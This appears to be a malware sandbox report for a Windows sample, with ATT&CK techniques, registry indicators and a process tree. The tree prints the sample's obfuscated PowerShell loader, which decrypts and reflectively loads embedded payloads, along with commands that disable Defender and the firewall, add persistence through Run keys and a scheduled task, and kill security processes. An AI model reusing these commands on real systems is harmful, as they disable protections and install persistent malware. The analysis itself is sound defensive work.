d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies firewall policy service 3 TTPs 2 IoCs

Modify Registry

Windows Service

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2316	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 40 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2648	powershell.exe
1676	powershell.exe
1688	powershell.exe
1408	powershell.exe
2364	powershell.exe
1840	powershell.exe
960	powershell.exe
2760	powershell.exe
2536	powershell.exe
2380	powershell.exe
2176	powershell.exe
1664	powershell.exe
2404	powershell.exe
2672	powershell.exe
2300	powershell.exe
1652	powershell.exe
2288	powershell.exe
2556	powershell.exe
2036	powershell.exe
2688	powershell.exe
2632	powershell.exe
1568	powershell.exe
444	powershell.exe
1532	powershell.exe
2676	powershell.exe
2352	powershell.exe
956	powershell.exe
3052	powershell.exe
2272	powershell.exe
640	powershell.exe
2188	powershell.exe
2672	powershell.exe
1764	powershell.exe
1060	powershell.exe
2272	powershell.exe
2412	powershell.exe
2752	powershell.exe
2292	powershell.exe
752	powershell.exe
2208	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
1256	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 2 IoCs

pid	Process
2476	jiwkptio.0yj.exe
2484	jiwkptio.0yj.exe

Indicator Removal: Clear Persistence 1 TTPs 5 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

persistence privilege_escalation

Clear Persistence

T1070.009

pid	Process
264	cmd.exe
580	cmd.exe
1596	cmd.exe
2256	cmd.exe
1904	cmd.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3036	sc.exe
2560	sc.exe
2632	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Kills process with taskkill 9 IoCs

pid	Process
2604	taskkill.exe
628	taskkill.exe
448	taskkill.exe
2172	taskkill.exe
2928	taskkill.exe
2292	taskkill.exe
2392	taskkill.exe
1288	taskkill.exe
2856	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

pid	Process
2196	reg.exe
2352	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3028	schtasks.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2760	powershell.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
2672	powershell.exe
2648	powershell.exe
2536	powershell.exe
1676	powershell.exe
2760	powershell.exe
1688	powershell.exe
2380	powershell.exe
1408	powershell.exe
2364	powershell.exe
2176	powershell.exe
1840	powershell.exe
960	powershell.exe
1664	powershell.exe
2404	powershell.exe
2328	B4B2DF0C17B9CC137372CFB2165D613B.exe
2328	B4B2DF0C17B9CC137372CFB2165D613B.exe
2328	B4B2DF0C17B9CC137372CFB2165D613B.exe
2328	B4B2DF0C17B9CC137372CFB2165D613B.exe
1532	powershell.exe
3052	powershell.exe
2412	powershell.exe
2688	powershell.exe
2752	powershell.exe
2676	powershell.exe
2292	powershell.exe
2300	powershell.exe
2272	powershell.exe
640	powershell.exe
1652	powershell.exe
2288	powershell.exe
2188	powershell.exe
2672	powershell.exe
2556	powershell.exe
1764	powershell.exe
2632	powershell.exe
1060	powershell.exe
2272	powershell.exe
2036	powershell.exe
1568	powershell.exe
2352	powershell.exe
444	powershell.exe
956	powershell.exe
752	powershell.exe
2208	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2328	B4B2DF0C17B9CC137372CFB2165D613B.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	960	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	2604	taskkill.exe
Token: SeDebugPrivilege	2292	taskkill.exe
Token: SeDebugPrivilege	448	taskkill.exe
Token: SeDebugPrivilege	628	taskkill.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	2172	taskkill.exe
Token: SeDebugPrivilege	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe
Token: SeDebugPrivilege	2928	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	2856	taskkill.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	2208	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 2892	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	31
PID 2328 wrote to memory of 2892	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	31
PID 2328 wrote to memory of 2892	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	31
PID 2328 wrote to memory of 2168	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	32
PID 2328 wrote to memory of 2168	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	32
PID 2328 wrote to memory of 2168	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	32
PID 2328 wrote to memory of 2672	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	35
PID 2328 wrote to memory of 2672	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	35
PID 2328 wrote to memory of 2672	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	35
PID 2892 wrote to memory of 2396	2892	cmd.exe	37
PID 2892 wrote to memory of 2396	2892	cmd.exe	37
PID 2892 wrote to memory of 2396	2892	cmd.exe	37
PID 2892 wrote to memory of 2760	2892	cmd.exe	38
PID 2892 wrote to memory of 2760	2892	cmd.exe	38
PID 2892 wrote to memory of 2760	2892	cmd.exe	38
PID 2892 wrote to memory of 2760	2892	cmd.exe	38
PID 2168 wrote to memory of 2772	2168	cmd.exe	39
PID 2168 wrote to memory of 2772	2168	cmd.exe	39
PID 2168 wrote to memory of 2772	2168	cmd.exe	39
PID 2168 wrote to memory of 2648	2168	cmd.exe	40
PID 2168 wrote to memory of 2648	2168	cmd.exe	40
PID 2168 wrote to memory of 2648	2168	cmd.exe	40
PID 2328 wrote to memory of 2536	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	41
PID 2328 wrote to memory of 2536	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	41
PID 2328 wrote to memory of 2536	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	41
PID 2328 wrote to memory of 1676	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	43
PID 2328 wrote to memory of 1676	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	43
PID 2328 wrote to memory of 1676	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	43
PID 2328 wrote to memory of 1688	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	45
PID 2328 wrote to memory of 1688	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	45
PID 2328 wrote to memory of 1688	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	45
PID 2328 wrote to memory of 2380	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	47
PID 2328 wrote to memory of 2380	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	47
PID 2328 wrote to memory of 2380	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	47
PID 2328 wrote to memory of 1408	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	49
PID 2328 wrote to memory of 1408	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	49
PID 2328 wrote to memory of 1408	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	49
PID 2328 wrote to memory of 2364	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	51
PID 2328 wrote to memory of 2364	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	51
PID 2328 wrote to memory of 2364	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	51
PID 2328 wrote to memory of 2176	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	53
PID 2328 wrote to memory of 2176	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	53
PID 2328 wrote to memory of 2176	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	53
PID 2328 wrote to memory of 1840	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	55
PID 2328 wrote to memory of 1840	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	55
PID 2328 wrote to memory of 1840	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	55
PID 2328 wrote to memory of 960	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	57
PID 2328 wrote to memory of 960	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	57
PID 2328 wrote to memory of 960	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	57
PID 2328 wrote to memory of 1664	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	59
PID 2328 wrote to memory of 1664	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	59
PID 2328 wrote to memory of 1664	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	59
PID 2328 wrote to memory of 2404	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	61
PID 2328 wrote to memory of 2404	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	61
PID 2328 wrote to memory of 2404	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	61
PID 2328 wrote to memory of 3028	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	63
PID 2328 wrote to memory of 3028	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	63
PID 2328 wrote to memory of 3028	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	63
PID 1684 wrote to memory of 2476	1684	taskeng.exe	66
PID 1684 wrote to memory of 2476	1684	taskeng.exe	66
PID 1684 wrote to memory of 2476	1684	taskeng.exe	66
PID 2328 wrote to memory of 2612	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	67
PID 2328 wrote to memory of 2612	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	67
PID 2328 wrote to memory of 2612	2328	B4B2DF0C17B9CC137372CFB2165D613B.exe	67

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\B4B2DF0C17B9CC137372CFB2165D613B.exe
"C:\Users\Admin\AppData\Local\Temp\B4B2DF0C17B9CC137372CFB2165D613B.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\cqxwsvrp.vd1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mLV7KrO3wLHHAAm4GaaFGgjj/GUAMMVOaPh3FGpoUZs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BMXXbGgs1mALdsCSxvMtpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZWVZX=New-Object System.IO.MemoryStream(,$param_var); $Tupqk=New-Object System.IO.MemoryStream; $pEVyq=New-Object System.IO.Compression.GZipStream($ZWVZX, [IO.Compression.CompressionMode]::Decompress); $pEVyq.CopyTo($Tupqk); $pEVyq.Dispose(); $ZWVZX.Dispose(); $Tupqk.Dispose(); $Tupqk.ToArray();}function execute_function($param_var,$param2_var){ $YwxMS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ALVCG=$YwxMS.EntryPoint; $ALVCG.Invoke($null, $param2_var);}$bwlKi = 'C:\cqxwsvrp.vd1.bat';$host.UI.RawUI.WindowTitle = $bwlKi;$NiVuC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bwlKi).Split([Environment]::NewLine);foreach ($OBjYH in $NiVuC) { if ($OBjYH.StartsWith('EiQdPpTgEPKAUuFHgbxm')) { $JPYHw=$OBjYH.Substring(20); break; }}$payloads_var=[string[]]$JPYHw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\pyow54ly.wxf.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PEylQItydp6DF2KLKsDsMrVgiK6Anhs4Yd2E90Yt80='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IfesP7NShxOIaefsOsYtLQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EgdKe=New-Object System.IO.MemoryStream(,$param_var); $IqEPB=New-Object System.IO.MemoryStream; $NGAHc=New-Object System.IO.Compression.GZipStream($EgdKe, [IO.Compression.CompressionMode]::Decompress); $NGAHc.CopyTo($IqEPB); $NGAHc.Dispose(); $EgdKe.Dispose(); $IqEPB.Dispose(); $IqEPB.ToArray();}function execute_function($param_var,$param2_var){ $TAWjc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hYpAi=$TAWjc.EntryPoint; $hYpAi.Invoke($null, $param2_var);}$bHXSX = 'C:\Users\Admin\AppData\Local\Temp\pyow54ly.wxf.bat';$host.UI.RawUI.WindowTitle = $bHXSX;$AnHdV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bHXSX).Split([Environment]::NewLine);foreach ($Yltfo in $AnHdV) { if ($Yltfo.StartsWith('CFYIvkGECqujgRZhzKOC')) { $GVQOC=$Yltfo.Substring(20); break; }}$payloads_var=[string[]]$GVQOC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SYSTEM\CurrentControlSet\Services' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2404
- C:\Windows\system32\schtasks.exe
  "schtasks" /create /tn "lockwin" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe" /rl LIMITED /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthService.exe
  2⤵
  PID:2612
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SecurityHealthService.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthSystray.exe
  2⤵
  PID:2552
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SecurityHealthSystray.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2292
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
  2⤵
  PID:576
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MsMpEng.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:628
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im NisSrv.exe
  2⤵
  PID:2508
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im NisSrv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:448
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SmartScreen.exe
  2⤵
  PID:264
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SmartScreen.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2392
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im mrt.exe
  2⤵
  PID:2896
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im mrt.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2172
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /im Explorer.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2928
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /im Explorer.exe /f
  2⤵
